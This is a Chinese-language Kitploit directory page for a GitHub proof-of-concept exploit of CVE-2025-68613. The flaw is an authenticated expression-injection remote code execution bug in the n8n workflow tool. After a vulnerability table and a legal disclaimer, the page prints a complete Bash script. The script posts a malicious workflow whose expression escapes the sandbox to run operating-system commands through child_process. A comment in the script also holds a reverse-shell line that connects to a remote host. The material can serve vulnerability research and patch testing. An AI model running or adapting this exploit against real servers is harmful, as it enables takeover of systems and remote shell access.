Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613 — CVE-2025-68613的概念验证漏洞利用:通过表达式注入在n8n中实现经过身份验证的远程代码执行 | Kitploit
工具/GitHubGitHub/mbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育远程访问工具Payload 开发
GitHubmbanyamer/n8n-authenticated-expression-injection-rce-cve-2025-68613

n8n-Authenticated-Expression-Injection-RCE-CVE-2025-68613

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

CVE-2025-68613的概念验证漏洞利用:通过表达式注入在n8n中实现经过身份验证的远程代码执行

查看仓库
228个月前尚未审核
分享

n8n 认证表达式注入远程代码执行 – CVE-2025-68613

严重远程代码执行 (CVSS 9.9) 在 n8n 工作流自动化工具中
概念验证 – 仅供教育和授权安全研究使用


⚠️ 重要法律警告

此代码严格仅供教育目的和在受控实验室环境中进行授权安全测试使用。

未经明确书面许可,在生产系统或任何系统上未经授权使用是违法的,并且在大多数司法管辖区违反了计算机滥用和网络安全法律。

使用风险自负。作者不对任何滥用行为负责。


漏洞信息

字段详细信息
漏洞利用标题n8n 认证表达式注入远程代码执行
CVECVE-2025-68613
披露日期2025-12-25
作者Mohammed Idrees Banyamer
作者国家约旦
联系方式/社交媒体Instagram: @banyamer_security
GitHubmbanyamer
供应商n8n.io
软件仓库github.com/n8n-io/n8n
受影响版本≥ 0.211.0 < 1.120.4
修复版本1.120.4, 1.121.1, 1.122.0 及以上
测试环境n8n 1.119.3 (Docker)
漏洞类型通过表达式沙箱逃逸的认证远程代码执行
CVSS 评分9.9(严重)

描述

此漏洞允许已认证用户使用恶意表达式创建或修改工作流,这些表达式绕过 n8n 的表达式沙箱,从而以 n8n 进程的权限执行完整的操作系统命令。


概念验证 – Bash 漏洞利用脚本

root@kitploit:~
#!/bin/bash
# Exploit Title: n8n Authenticated Expression Injection RCE
# Date: 2025-12-25
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://n8n.io
# Software Link: https://github.com/n8n-io/n8n
# Version: >=0.211.0 <1.120.4
# Tested on: n8n 1.119.3 (Docker)
# CVE : CVE-2025-68613

TARGET="http://localhost:5678"                  # ← Change to your target
API_KEY="your_n8n_api_key_here"                 # ← Insert valid API Key (or use Basic Auth / session)
CMD="id"                                        # ← Test command
# Example reverse shell: "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"

PAYLOAD="{{ (function(){ return this.process.mainModule.require('child_process').execSync('${CMD}').toString() })() }}"

echo "[*] Sending malicious workflow to ${TARGET}"

curl -s -X POST "${TARGET}/rest/workflows" \
  -H "Content-Type: application/json" \
  -H "X-N8N-API-KEY: ${API_KEY}" \
  -d '{
    "name": "CVE-2025-68613 PoC",
    "active": false,
    "nodes": [
      {
        "parameters": {
          "values": {
            "string": [
              {
                "name": "result",
                "value": "'${PAYLOAD}'"
              }
            ]
          }
        },
        "name": "Exploit",
        "type": "n8n-nodes-base.set",
        "typeVersion": 1,
        "position": [460, 300]
      }
    ],
    "connections": {}
  }'

echo -e "\n[!] Check n8n logs or the output node in the created workflow for command result\n"
下载工具